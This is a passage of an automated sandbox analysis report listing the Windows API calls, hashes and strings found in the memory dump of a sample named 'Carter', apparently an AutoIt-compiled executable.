                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0103CC3F
                                                                        • GetWindowRect.USER32(?,?), ref: 0103CC48
                                                                        • SetWindowTextW.USER32(?,?), ref: 0103CCB3
                                                                        • GetDesktopWindow.USER32 ref: 0103CCB9
                                                                        • GetWindowRect.USER32(00000000), ref: 0103CCC0
                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0103CD0C
                                                                        • GetClientRect.USER32(?,?), ref: 0103CD19
                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0103CD3E
                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0103CD69
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID:
                                                                        • API String ID: 3869813825-0
                                                                        • Opcode ID: 560215e6fba6a8403412670bc6fc4345ecb58a6eb2c9ba992d03292f8c13b7f1
                                                                        • Instruction ID: 913e3761078ac1a2d942e38cebf8f9c72378e764eebc10d83f60658fdbe887e0
                                                                        • Opcode Fuzzy Hash: 560215e6fba6a8403412670bc6fc4345ecb58a6eb2c9ba992d03292f8c13b7f1
                                                                        • Instruction Fuzzy Hash: 89515E31900709AFEB209FA8CE89B6EBBF9FF48705F104619F686E2594C775A904CB50
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0106A87E
                                                                        • DestroyWindow.USER32(00000000,?), ref: 0106A8F8
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0106A972
                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0106A994
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0106A9A7
                                                                        • DestroyWindow.USER32(00000000), ref: 0106A9C9
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FE0000,00000000), ref: 0106AA00
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0106AA19
                                                                        • GetDesktopWindow.USER32 ref: 0106AA32
                                                                        • GetWindowRect.USER32(00000000), ref: 0106AA39
                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0106AA51
                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0106AA69
                                                                          • Part of subcall function 00FE29AB: GetWindowLongW.USER32(?,000000EB), ref: 00FE29BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                        • String ID: 0$tooltips_class32
                                                                        • API String ID: 1297703922-3619404913
                                                                        • Opcode ID: 1168770422dd2f95b1492ecf8407463b03d4e1cef3bf27acd3d44e84d63cc365
                                                                        • Instruction ID: be51b315cc96fc4c9cd68744913cc545911b2b96892c003cddb31af1757a1b8e
                                                                        • Opcode Fuzzy Hash: 1168770422dd2f95b1492ecf8407463b03d4e1cef3bf27acd3d44e84d63cc365
                                                                        • Instruction Fuzzy Hash: 5071CB74640200AFE721DF28C808F6B7BE9FB89700F14465DFAC6A7295D776E902CB61
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0106CCCF
                                                                          • Part of subcall function 0106B1A9: ClientToScreen.USER32(?,?), ref: 0106B1D2
                                                                          • Part of subcall function 0106B1A9: GetWindowRect.USER32(?,?), ref: 0106B248
                                                                          • Part of subcall function 0106B1A9: PtInRect.USER32(?,?,0106C6BC), ref: 0106B258
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0106CD38
                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0106CD43
                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0106CD66
                                                                        • _wcscat.LIBCMT ref: 0106CD96
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0106CDAD
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0106CDC6
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0106CDDD
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0106CDFF
                                                                        • DragFinish.SHELL32(?), ref: 0106CE06
                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0106CEF9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                        • API String ID: 169749273-3440237614
                                                                        • Opcode ID: c02408a05d7b1616df33262b93aa026dd0c584d70a56b9fcf26b0b6b98585088
                                                                        • Instruction ID: 3ba86cc1fd9e4e90b96aac726a41c66c4f46ee29dc0389eb8b8084051dbf236e
                                                                        • Opcode Fuzzy Hash: c02408a05d7b1616df33262b93aa026dd0c584d70a56b9fcf26b0b6b98585088
                                                                        • Instruction Fuzzy Hash: 9F618771508301AFD711EF60CC88DABBBE8EF89710F000A1DF6D5961A1DB35AA09CB62
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(00000000), ref: 0104831A
                                                                        • VariantCopy.OLEAUT32(00000000,?), ref: 01048323
                                                                        • VariantClear.OLEAUT32(00000000), ref: 0104832F
                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0104841D
                                                                        • __swprintf.LIBCMT ref: 0104844D
                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 01048479
                                                                        • VariantInit.OLEAUT32(?), ref: 0104852A
                                                                        • SysFreeString.OLEAUT32(?), ref: 010485BE
                                                                        • VariantClear.OLEAUT32(?), ref: 01048618
                                                                        • VariantClear.OLEAUT32(?), ref: 01048627
                                                                        • VariantInit.OLEAUT32(00000000), ref: 01048665
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                        • API String ID: 3730832054-3931177956
                                                                        • Opcode ID: 0d31a833b9034dc83b8e81aa2bb237cb4a75502e4460c1820ac19abb08566a8c
                                                                        • Instruction ID: b508af8edab950f381086577dbdd02c536b0c69e6c66233c8a12cae5b21afed0
                                                                        • Opcode Fuzzy Hash: 0d31a833b9034dc83b8e81aa2bb237cb4a75502e4460c1820ac19abb08566a8c
                                                                        • Instruction Fuzzy Hash: B3D1E4B1A04116DBEB60AFE5C8C4B7EBBF4BF05701F04C9AAE585AB194DB34D840CB91
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 01064A61
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01064AAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                        • API String ID: 3974292440-4258414348
                                                                        • Opcode ID: 84aaeeb0179097ae195a903ac0c5e48f9617eeda131c5d139b924ff258d91407
                                                                        • Instruction ID: e496985481998a9c30092cd7674a8c8b0b74d321789353c480f4daf99fe54285
                                                                        • Opcode Fuzzy Hash: 84aaeeb0179097ae195a903ac0c5e48f9617eeda131c5d139b924ff258d91407
                                                                        • Instruction Fuzzy Hash: 79917A342046059FDB14EF24C850AADB7E5BF94364F00885DE8D69B3A2CB35FD4ADB91
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 0104E31F
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0104E32F
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0104E33B
                                                                        • __wsplitpath.LIBCMT ref: 0104E399
                                                                        • _wcscat.LIBCMT ref: 0104E3B1
                                                                        • _wcscat.LIBCMT ref: 0104E3C3
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0104E3D8
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104E3EC
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104E41E
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104E43F
                                                                        • _wcscpy.LIBCMT ref: 0104E44B
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0104E48A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                        • String ID: *.*
                                                                        • API String ID: 3566783562-438819550
                                                                        • Opcode ID: 6c5d7962b36479aa0970447fb8c4b1dae14e05ce42e974be29290392c4361646
                                                                        • Instruction ID: 5b00147d54bd66c20c6539c9ee802baaa9d7dce4e737ec381a7272845988fc79
                                                                        • Opcode Fuzzy Hash: 6c5d7962b36479aa0970447fb8c4b1dae14e05ce42e974be29290392c4361646
                                                                        • Instruction Fuzzy Hash: CA618CB25042469FC710EF64C88499EB7E8FF89310F04896EF9C9C7251DB39E905CB92
                                                                        APIs
                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0104A2C2
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0104A2E3
                                                                        • __swprintf.LIBCMT ref: 0104A33C
                                                                        • __swprintf.LIBCMT ref: 0104A355
                                                                        • _wprintf.LIBCMT ref: 0104A3FC
                                                                        • _wprintf.LIBCMT ref: 0104A41A
                                                                        Strings
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,0102F8B8,00000001,0000138C,00000001,00000002,00000001,?,01053FF9,00000002), ref: 0104009A
• LoadStringW.USER32(00000000,?,0102F8B8,00000001), ref: 010400A3
  • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
• GetModuleHandleW.KERNEL32(00000000,010A7310,?,00000FFF,?,?,0102F8B8,00000001,0000138C,00000001,00000002,00000001,?,01053FF9,00000002,00000001), ref: 010400C5
• LoadStringW.USER32(00000000,?,0102F8B8,00000001), ref: 010400C8
• __swprintf.LIBCMT ref: 01040118
• __swprintf.LIBCMT ref: 01040129
• _wprintf.LIBCMT ref: 010401D2
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 010401E9
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
APIs
  • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
  • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
• CharLowerBuffW.USER32(?,?), ref: 0104AA0E
• GetDriveTypeW.KERNEL32 ref: 0104AA5B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0104AAA3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0104AADA
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0104AB08
  • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0104A852
• __swprintf.LIBCMT ref: 0104A874
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0104A8B1
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0104A8D6
• _memset.LIBCMT ref: 0104A8F5
• _wcsncpy.LIBCMT ref: 0104A931
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0104A966
• CloseHandle.KERNEL32(00000000), ref: 0104A971
• RemoveDirectoryW.KERNEL32(?), ref: 0104A97A
• CloseHandle.KERNEL32(00000000), ref: 0104A984
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0106982C,?,?), ref: 0106C0C8
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C0DF
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C0EA
• CloseHandle.KERNEL32(00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C0F7
• GlobalLock.KERNEL32(00000000), ref: 0106C100
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C10F
• GlobalUnlock.KERNEL32(00000000), ref: 0106C118
• CloseHandle.KERNEL32(00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C11F
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C130
• OleLoadPicture.OLEAUT32(?,00000000,00000000,01073C7C,?), ref: 0106C149
• GlobalFree.KERNEL32(00000000), ref: 0106C159
• GetObjectW.GDI32(00000000,00000018,?), ref: 0106C17D
• CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0106C1A8
• DeleteObject.GDI32(00000000), ref: 0106C1D0
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0106C1E6
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
APIs
  • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0106C8A4
• GetFocus.USER32 ref: 0106C8B4
• GetDlgCtrlID.USER32(00000000), ref: 0106C8BF
• _memset.LIBCMT ref: 0106C9EA
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0106CA15
• GetMenuItemCount.USER32(?), ref: 0106CA35
• GetMenuItemID.USER32(?,00000000), ref: 0106CA48
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0106CA7C
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0106CAC4
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0106CAFC
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0106CB31
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
APIs
  • Part of subcall function 01038E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01038E3C
  • Part of subcall function 01038E20: GetLastError.KERNEL32(?,01038900,?,?,?), ref: 01038E46
  • Part of subcall function 01038E20: GetProcessHeap.KERNEL32(00000008,?,?,01038900,?,?,?), ref: 01038E55
  • Part of subcall function 01038E20: HeapAlloc.KERNEL32(00000000,?,01038900,?,?,?), ref: 01038E5C
  • Part of subcall function 01038E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01038E73
  • Part of subcall function 01038EBD: GetProcessHeap.KERNEL32(00000008,01038916,00000000,00000000,?,01038916,?), ref: 01038EC9
  • Part of subcall function 01038EBD: HeapAlloc.KERNEL32(00000000,?,01038916,?), ref: 01038ED0
  • Part of subcall function 01038EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01038916,?), ref: 01038EE1
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01038B2E
• _memset.LIBCMT ref: 01038B43
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01038B62
• GetLengthSid.ADVAPI32(?), ref: 01038B73
• GetAce.ADVAPI32(?,00000000,?), ref: 01038BB0
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01038BCC
• GetLengthSid.ADVAPI32(?), ref: 01038BE9
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01038BF8
• HeapAlloc.KERNEL32(00000000), ref: 01038BFF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 01038C20
• CopySid.ADVAPI32(00000000), ref: 01038C27
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01038C58
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01038C7E
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 01038C92
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
APIs
• GetDC.USER32(00000000), ref: 01057A79
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 01057A85
• CreateCompatibleDC.GDI32(?), ref: 01057A91
• SelectObject.GDI32(00000000,?), ref: 01057A9E
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01057AF2
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01057B2E
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01057B52
• SelectObject.GDI32(00000006,?), ref: 01057B5A
• DeleteObject.GDI32(?), ref: 01057B63
• DeleteDC.GDI32(00000006), ref: 01057B6A
• ReleaseDC.USER32(00000000,?), ref: 01057B75
                                                                        Similarity
                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                        • String ID: (
                                                                        • API String ID: 2598888154-3887548279
                                                                        • Opcode ID: aedef1644cbefe6ebadd44b5ef283ea0976540f2805a03b6530e0afb847b647b
                                                                        • Instruction ID: 7f97db4664a2877d5113823c7a43a65502c4239f34d020dd9c78153832a477cc
                                                                        • Opcode Fuzzy Hash: aedef1644cbefe6ebadd44b5ef283ea0976540f2805a03b6530e0afb847b647b
                                                                        • Instruction Fuzzy Hash: 49515D71900309EFDB65CFA8C884EAFBBB9FF49310F14851DF989A7254D775A9408BA0
                                                                        APIs
                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0104A4D4
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 0104A4F6
                                                                        • __swprintf.LIBCMT ref: 0104A54F
                                                                        • __swprintf.LIBCMT ref: 0104A568
                                                                        • _wprintf.LIBCMT ref: 0104A61E
                                                                        • _wprintf.LIBCMT ref: 0104A63C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 311963372-2391861430
                                                                        • Opcode ID: c8e553c4bc707a2987a24c444ed0621e6fe86de2a00d27d68f73642d06d183f4
                                                                        • Instruction ID: 93e0c56018ccd376ddee8b9b8b50877c0caa1b66f9e9a66a3dff12e6126ba514
                                                                        • Opcode Fuzzy Hash: c8e553c4bc707a2987a24c444ed0621e6fe86de2a00d27d68f73642d06d183f4
                                                                        • Instruction Fuzzy Hash: 4F518DB1940119EBDF25EBE0CD81EEEB778BF18340F104165F645B21A1DB3A6E48EB90
                                                                        APIs
                                                                          • Part of subcall function 0104951A: __time64.LIBCMT ref: 01049524
                                                                          • Part of subcall function 00FF4A8C: _fseek.LIBCMT ref: 00FF4AA4
                                                                        • __wsplitpath.LIBCMT ref: 010497EF
                                                                          • Part of subcall function 0100431E: __wsplitpath_helper.LIBCMT ref: 0100435E
                                                                        • _wcscpy.LIBCMT ref: 01049802
                                                                        • _wcscat.LIBCMT ref: 01049815
                                                                        • __wsplitpath.LIBCMT ref: 0104983A
                                                                        • _wcscat.LIBCMT ref: 01049850
                                                                        • _wcscat.LIBCMT ref: 01049863
                                                                          • Part of subcall function 01049560: _memmove.LIBCMT ref: 01049599
                                                                          • Part of subcall function 01049560: _memmove.LIBCMT ref: 010495A8
                                                                        • _wcscmp.LIBCMT ref: 010497AA
                                                                          • Part of subcall function 01049CF1: _wcscmp.LIBCMT ref: 01049DE1
                                                                          • Part of subcall function 01049CF1: _wcscmp.LIBCMT ref: 01049DF4
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01049A0D
                                                                        • _wcsncpy.LIBCMT ref: 01049A80
                                                                        • DeleteFileW.KERNEL32(?,?), ref: 01049AB6
                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01049ACC
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01049ADD
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01049AEF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                        • String ID:
                                                                        • API String ID: 1500180987-0
                                                                        • Opcode ID: 3580501119801ea2c3b4f7f36b9e6da3c3297feaa910a76b4c9d1adf254e5487
                                                                        • Instruction ID: c1a867a9391136aba90e8ede4bc06341055de4eee525a5265affa67ef275f00a
                                                                        • Opcode Fuzzy Hash: 3580501119801ea2c3b4f7f36b9e6da3c3297feaa910a76b4c9d1adf254e5487
                                                                        • Instruction Fuzzy Hash: 0DC12BB1D0021DABDF21DF95CC84AEFB7BDAF59314F0040BAE649E6150EB349A848F65
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00FF5BF1
                                                                        • GetMenuItemCount.USER32(010A7890), ref: 01030E7B
                                                                        • GetMenuItemCount.USER32(010A7890), ref: 01030F2B
                                                                        • GetCursorPos.USER32(?), ref: 01030F6F
